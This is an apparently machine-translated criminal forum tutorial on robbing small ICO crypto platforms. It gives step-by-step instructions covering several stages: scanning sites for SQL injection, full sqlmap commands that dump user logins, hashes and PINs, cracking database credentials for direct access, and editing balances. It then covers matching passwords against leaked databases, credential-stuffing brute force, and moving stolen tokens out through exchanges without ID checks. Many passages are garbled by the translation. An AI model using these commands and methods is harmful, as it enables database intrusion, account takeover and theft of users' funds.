Introduction
In this article I will tell you a really working case how to raise the money almost without any investment and in a short time, each stage will be considered in detail so that there are no questions, but if you have any, welcome to the comments. We will be searching for vulnerable ICOs, dumping them and withdrawing tokens from them to exchanges and so on. Those who dumps this article will seem very familiar, but even they will find something new for themselves, because there will be a practical plan of actions. I am sure that there will definitely be some haters, from whom I take the bread with this article.
Finding Purpose
Finding the right target is half the battle and this is what determines how successful our venture will be. We need ICO projects with small, but not insignificant attendance, about 20k views per month will be enough, information about views you can see on appropriate sites [1]
The next criteria is the conditions of withdrawal from the ICO, we need to find an icon where you do not need a valid e-mail for the withdrawal, and if you need it, it can be changed without any difficulty, it is desirable that to withdraw would be required by any pin code or two factor authentication code, as well in general it would be nice if the output would not need any confirmations, etc., but best of all that would be a 6-digit pin code.
And so, where do we find such a target? Targets we will borrow from our fellow hackers, who are mainly engaged in brute force, I think everyone knows the software such as keeper, butit and übc, on these platforms, writing brutes and chekerae for all sorts of services, including ico. I will look on one of the neighboring boards, in the next branch.
1.jpg.ffe1d01596fee04f5fff78a21bb4e8fd.jpg
Actually go and look at the topics, usually they have a description of these very sites, when they display and what you need to display, in general, looking for icons on the criteria that I listed above, in some tops will be Hyde, we can ask personal, you may give it. Collect the names of all the ico-sites in one textbox.
Web scanners
Now that we have collected a normal number of icons, we need to check each of the targets in the web scanner.
The most common scanners are Netsparker, Acunetix, Owasp Zap, burp suite. As you can see there scanners for every taste and color, however, I advise you to use all scanners one by one, what missed Sparker can find Acunetix, or what missed both of these scanners can find burp, I used all these scanners and most of them I like Sparker, ovasp a little weak, and burp gives light to them all. However, it’s worth noting that different versions of sparker behave differently and one version of sparka can find a hole and another can’t, I use the following versions: 4.9.5.18523 and 5.9.1.29030.
2.jpg.9453eeb9c27910cea9b405bbfde54b99.jpg
We need to configure scanners to search Sql injection, I will show on the example of Netsparker, in other scanners the situation is almost the same, the differences are only minor details.
First click on Scan Policy Editor, duplicate the main preset, then rename it as you want and in the Security Check Group leave the checkbox next to Sql injection, also you can use scanners to search for other vulnerabilities, LFI, XSS, XXE, etc. but we are not interested now, just save the settings.
3.jpg.398a7d8a68ef1394a3e56bbbe24e8f15.jpg
Click the button to start scanning, specify the link to the site that we want to scan, select the corresponding preset that we just created, also if the site has any security mechanisms that generate special cookies, then just go to the site in your browser, wait until you access the site, then just paste them into the appropriate window in the sparker, start scanning and can go about their business.
4.jpg.da36afc1b7c4291af070971eba6456b0.jpg
If the site is vulnerable, then at the end of the window, you will see a red circle with an exclamation mark, click and it will show where the vulnerability, it may be that the site is vulnerable in several places, there is no luck, also if you scanned the main domain and found nothing, then try to scan all subdomains, in this case I scanned a subdomain which is redirected when you want to log on to the site.
5.jpg.d16df9a70add3d0e96b772df88107d19.jpg
So, you can right click on the vulnerable place (“/auth/email_chk (val2 (POST),val1)”), a context menu will pop up, where the line “Copy sqlmap Command” is boldly read, logically it copies the command for the map to the clipboard, let’s see what we have copied.
6.jpg.26fb270a0736be7e2969d97465af7d40.jpg
As you can see the picture is not very pretty, I prefer to make up a quest file and already shove it into the map, as for me so the command is beautiful and more concise. To make up a Requests file we click on the vulnerable place (“/auth/email_chk (val2 (POST),val1)”), choose HTTP Request /Response tab, copy all data to any text file and make sure to remove pailode, which automatically set up sparker (since mappa should set its own parameters).as map should substitute its own) and remove unnecessary and other garbage headers, which are superfluous, you can compare the screenshot with sparker above and screen with a text file, you will understand everything.
7.jpg.ccc61454af2f99b358b2010b19898019.jpg
Save it all in a convenient place and move on to the next part.
Sqlmap
8.jpg.1c428c9a949f248e53c91603763e2850.jpg
In this part I will directly look at how to merge the database site, before you start dumping be sure to update the map[2] to the latest version. And so, the command that sparker gave us looks like this:
sqlmap.py -u “https://master.*****.com/auth/email_chk” -p “val2″ –risk=”3″ –level=”3″ –method=”POST” –data=”val1=netsparker%40example.com&val2=test” –user-agent=”Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36″ –cookie=”__zlcmid=13IjuPSLHgWcLj8; ci_session=76vvdh8ren0vgikibjpvhe0mm9bspb5r” –headers=”Host:master.***.com\nAccept:application/json, text/javascript, */*; q=0.01\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded; charset=UTF-8\nOrigin:https://master.****.com\nReferer:https://master.****.com/auth/signup\nX-Requested-With:XMLHttpRequest” –dbms=”MySQL” –batch
After our shamanic efforts with the requester file, it converts to the following:
sqlmap.py -r target.txt -p val2 –risk=3 –level=3 –dbms=MySQL –batch –dbs
I think the difference is quite noticeable. So let’s see what each of the arugment means and also look at some other stuff you should also know.
-u With this argument we specify a link to our target which we want to download, –method, respectively, specifies the request method, in our case it is a POST request, if we find a vulnerable site with GET method, in some way more convenient to specify a link to a site not through the quest file, but through the argument -u (for example, if we have a get but not post: sqlmap.py -u “https://master.*****.com/auth/email_chk.php?val2=test” -p val2 –risk=3 –level=3 –dbms=MySQL -batch -dbs –random-agent), the parameter -data specifies the Post Data to send, with the get method it is not, there are user-agent (–user-agent), handlers (–headers), cookies (–cookie).
Above listed we just stuffed in the request file, thereby nicely shaped everything, I prefer to do exactly this way and you too should do it.
-p Indicates a vulnerable parameter, in our case it’s val2, look in the sparker what parameter you have, and also look in the sparker what DBMS is used on the site, in my case it’s MySQL.
9.jpg.cfa4c38e395261b15e1af7518d0f13a9.jpg
–batch Never ask for user input, use default behavior
–dbs Outputs databases
You can read about the different levels of –level and –risk in the sources[3]
There is also an important argument, which is not in our command, but it is obligatory, through which sql injection technique is specified, in some cases the map may not spin up the bore at all without it, I had very many cases where the map just did not spin up the bore without this parameter, so it is better to add it. Argument —technique can take several values EUQBST, each letter means a different technique, you can specify several letters at once.
Blind
B: Boolean-based blind
S: Stacked queries
T: Time-based blind
Regular
E: Error-based
U: Union query-based
Q: Inline queries
In our case I add –technique=E.
If you get a picture like this, it means that the map successfully untwisted the whine and got the names of the databases.
10.jpg.e62cff6efd8880c329ba85e1aea37005.jpg
Now all we have to do is browse through the tables, select the right one, and merge the data from it. Let’s go back to our team.
sqlmap.py -r target.txt -p val2 –risk=3 –level=3 –dbms=MySQL –batch –dbs –technique=E
Now that we have the database names, we no longer need the –dbs argument, remove it and convert the command as follows.
sqlmap.py -r target.txt -p val2 –risk=3 –level=3 –dbms=MySQL –batch –technique=E -D master_wallet –tables
With -D we select the database, –tables says that it needs tables.
11.jpg.2aacb2f512c4029eefb04c057e5c8fbc.jpg
Now among the tables we are looking for the one that supposedly stores user data, in our case it is a member table, you may have another name for it (e.g. users or something similar), you need to look at the circumstances, now we get the columns -D master_wallet -T member –columns.
12.jpg.8aae3e2e13a443c59015a81fb6c80e40.jpg
Now when we got the columns approximately choose what we need, in my case I need data about login, password, mail, balance, name and pin code, other data are of secondary importance to me, specify which columns we need and merge them, the result of the command is this:
sqlmap.py -r target.txt -p val2 –risk=3 –level=3 –dbms=MySQL –batch –technique=E -D master_wallet -T member -C mem_id,email,mem_pw,mem_name,gcc,deal_pw,mem_name,mobile –dump -threads=10
This will start dumping the site if you need to stop it suddenly Ctrl+C
Start with specific line –start=1000
Everything you dump is stored in AppData\Local\sqlmap\output, but you can change this path with the –output-dir argument
You can read about other parameters which are in the map in the documentation[4]
Wafs and other shit
While our site is being dumped, I would like to make a small digression and also reveal the main question, which has been begging since the beginning – “what about the tampers?
From my experience, if you used sparker to search for a whine and it gave you a hole, most likely you won’t need any tampers, and the whine is not untwisted because you did something wrong, more likely try to play with levels and risks, also you can try to add arguments –no-cast or -hex (more info in docs).
Sqlmap itself kinda knows how to define all sorts of waf, but the key word here is “kinda”, the best way to define waf is to use modules whatwaf[5] and wafw00f[6].
They will give you tampers, then you just need to add them to your query, if it gives several tampers, then try each one in turn or combine them.
13.jpg.5776022cce9475d93a24ed244e0afb10.jpg
Regarding tampers can not say anything specific which one where to substitute, because wafs are very many and almost all are individual and they need their own approach. The same cloud can be bypassed by specifying the real ip address of the site (you can google a lot of manuals) and the site host (-u “ip/auth/email_chk.php?val2″ –host=”master.*****.com”).
If you want, you can read additional material about tampers[7]
NaviCat And PHPMyAdmin(Full Access)
Still an aside..
You just have to read it! Is such that get vulnerable site, and there whining blind or the database is so big that the drain is very long, then the option you can try to connect to the database directly without a whine. If the administrator is still aleeshka, you can find on the site and artifacts such as PHPMyAdmin, just try to add /phpmyadmin/ to the site, and maybe it turns out that there is a panel, which the sysadmin forgot.
14.jpg.17bc3cb153b7dcb76838fc5413b71182.jpg
If you can’t find the panel, try scanning the ports (“nmap site.com”), we need port 3306 where mysql hangs.
15.jpg.02bbe1960cf104ac7afdba213d63c423.jpg
If this port is open, we can connect to the server via NaviCat[8]. But now we need some credentials for mysql, where can we get them? I hope you have not forgotten about the sqlmap documentation.
16.jpg.5745e9d0a6da43eb75c105f811ff6b79.jpg
Add the -passwords argument to the command and boom, this is what we have in the end. We got the user names and hashes of their passwords, don’t rush to cancel the popup, let it try to break the passwords, it is likely that it will break some of them after all.
17.jpg.e434bcfdafba8d3dbd4f739d5246289b.jpg
We are interested in the root account. Here we have hashed passwords, you need a password hash and a password database to break them, you must have heard how that works. So what do you do when you’ve cracked the passwords and got access to the account? And we can do whatever we want, because now we have full access to the database, we can delete it, but that’s not what we are interested in. We can download the database in a very short time, because now we have direct access, the base is pumped out in *.sql format, in order that would then read the data can use the old as the world software SQLRip[9].
18.jpg.c3e21fa01b09231df6473e252300956e.jpg
To connect to the base with port 3306 open, download the software NaviCat, click Connection, in the context menu select your DBMS, in my case is MySQL, after we will see this window.
19.jpg.7ab65479132496f1ef1b6c4dd9151109.jpg
Write what we want, we can write the name of the site we’re attacking
Ping the site in cmd and type in its IP address
The username of the account that you have broken, look closely in the screenshot above mappa look, there is a user root hash duplicated with another username, it is this username that we enter
No comment
Or we can tweak the balance of some users and add a couple of zeros. Here, everything rests only in the knowledge of the language itself sql, in itself it is very easy and even if you do not know it you can stupidly google what you need, this is if you have phpmyadmin. If you have NaviCat, you just get ecstasy from the fact that there’s no need to write a line of code, just change the data themselves, NaviCat will do the rest for you, very powerful software. Regarding how to give the data in NaviCat.
20.jpg.e097c8e745ffb7e956380319306382ee.jpg
There’s not much on the internet about this, so keep that in mind.
Hash and the two Antipubliks
Let’s go back to our ico that we leak. Since we live in the 21st century, that means what? That’s right! This means that md5 and other “weak” hashes nobody uses any more, nowadays almost all websites have passwords encrypted by bript, which makes the work of dumpers more difficult, because not everybody is ready to buy this stuff, bript hashes are breaking very long time by their specificity, so everybody uses them, even the smallest garage garage company uses bript, and right! I would also use it if I kept any site. But we’re not holding a site, we’re attacking it.
21.jpg.16a235bdc35daab928e7db04b2362fbc.jpg
So in our dump the passes are encrypted by a script, the first thought you might have is to try breaking them with a hash, but after you see how long it takes you’ll probably think about giving up on the whole thing, but it’s not the case. The truth is everyone fucks with the same strings, which have minor differences, and it is likely that half of the users you have in your database (maybe more, maybe less) have already left the same password somewhere and it was leaked on the internet, this is the main reason to choose ico where you need a pin or 2fa for output. So we sort database by balance, take soapboxes and logins, if you or your friends have their own antipablick, you can pull lines from AP with ItemSearch[10]. If I can’t find it, then we can buy muzzle[11] and to pull out passwords from it, but if we have bum starter pack, then there is trial for two days, with possibility to pick up passwords to 1k mails, I did it, because 1k mails was enough for me, I took trial and wrote small script [12] on Delphi which picks up passwords.
22.jpg.3b0541f189e76a0147dfcb058e7c6483.jpg
However, the authorization on the site only by username and password, then I wrote another script[13], which would substitute to the logins the passwords found to mail.
That is, I have the following: Login,email,hashpass and email:pass as a result the soapboxes are compared and by substitution we get login:pass. Or you can just take the passwords that murz will find, local AP, etc. and just make a word for hash. I will not publish the code of both scripts here, because the article is already too long, however I will leave the sources for you to download and read. All the links you can find at the end of the article.
Brute
Now that we have made a selection, the stars are aligned and we have a small login:pass base, we need to check it for bugs. Since we were looking for our icon among the projects on keeper, boolet and ubz, then we have a project on this icon, boolet[14] is free and we can just download it and put our base to brute force, but keeper and ubz paid software, since we have here the article goes without cost 0$, let’s try to write a brute force on our icon.
Open our site, which will write the brute, press Ctrl + Shift + J (I have Yandex browser), before you open a panel on the right, select the tab Network (This is our sniffer), enter in the username and password, any data and press enter, left where the Name should appear link, Also click on it, and we will see an almost similar picture to the one in netsparker when we built the queue file, we also need to take the headers and postdata (Form Data is the same Post Data, where id is our login, and pw is our password). It happens that there is even a token got there, then we need to first make a Get request to the main page, spar token, and then paste it into our post date, in general about the writing the brute force one more separate article, because there is a lot of information and small details, so we will not go into such details. Details about how to write brutes can be found on the Internet. And even better if you take from the Internet ready working configurations open for editing and looking at them will learn to make projects.
23.jpg.db0100a6b4758edeac5a8b661681e22c.jpg
In the Response tab, to the right of Headers, we can see the data that came in the response.
This came to us on a random data
{“result”: “N”, “msg”: “This ID is not checked.”}
It’s to the data where the password is wrong
{“result”: “N”, “msg”: “Please check the input.”}
That’s a good one
{“result”: “Y”, “msg”: “Login Successful”}
Judging by these answers and hiders we are going to build the project. Open the boolet, go to the tab Configs->New Specify the name of the project, click on the plus sign on the left, in the window that appears choose Request and fill in according to the data from the sniffer.24.jpg.569da9e0565c60fe3e88709fbdde261a.jpg
25.jpg.b85df37457d56d1404ae181484d7ddf3.jpg
I think you get the idea. Save the project, run it and wait for the bugs to accumulate. This part of the article is a bit crumpled, but if you have any questions or need help with writing a more complex brute force, for example for a mobile app, don’t hesitate to ask.
Output to and from exchanger
After we found the goo, we need to withdraw the balance from the ICO to the exchange, look at the site at which exchanges we can withdraw, and choose the one that does not need a verif with docks to withdraw, in our case it is latoken. The first time when I tried to do something there, I got an error because I was sitting under a VPN USA, so be careful, in the USA they choke bitcoins, use a VPN of another country.
26.jpg.e0306e020e6758f660cd708c882447a7.jpg
I don’t know how it will be with you, personally I had withdrawals only on Wednesdays at a certain time, to confirm the withdrawal it was necessary to enter a temporary code which comes in the mail and a 6-digit pin code which we had in our database. The system is that to change the pincode you need a valid email, and to change the soap pincode. Therefore, I first changed the soap on mine, because I knew the pin code, and then confirmed the output with the code that came to the mail and the 6-digit pin code that was in the database.
27.jpg.7b7f61f8b7ef779a327542c8aca20e06.jpg
Then, when the coins come to the exchange (usually with delays, you have to wait a bit), just sell them for the bitcoins and withdraw them to your wallet, that’s all.
28.jpg.a0ab4ba97602fe509281c67b8cb93f74.jpg
A few words here and there yes ..
Now a few points that I purposely left out so as not to break the narrative of the article:
If you find a cookie in the database, you can forget about the part about writing the brute force and picking up passwords because you won’t need anything else to log in.
You can use sqlmap to search for vulnerabilities
If you have blind whining, you can use DNS Exfiltration (–dns-domain) technique to speed up dumping, you can google it easily
In case you have a stacked queries injection type and an admin account (–is-dba), you can get a shell (–os-shell)
If you don’t have enough goodies, you can try to fool the soapboxes themselves and use them to restore the accounts
If you have a site with 2fa, then you had to sdampit column, which stores keys for google authenticator download to your mobile authenticator, add a key to it (Enter a setup key) use the generated codes
In the database may well be stored private keys from different wallets, be careful, otherwise you can miss a lot of money
Conclusion
That’s actually the end of the article, I’ve disclosed a very profitable case for the execution of which you don’t need a penny. This is a very big topic, it is difficult to talk about all of the instruments in one article, so as not to forget anything. As for me, each instrument deserves its own article, because there is so much information on them that could make a whole series of articles. No matter how good tools you have, you won’t be able to reach their full potential without sufficient experience and skill. I’ve shown the basic and most significant points, but even they are enough to pull off something like this on your own. If after reading the article you have any questions that you do not find answers, I will be happy to answer your questions, I can also help with the promotion of scool, writing brut, etc. Thank you for your attention!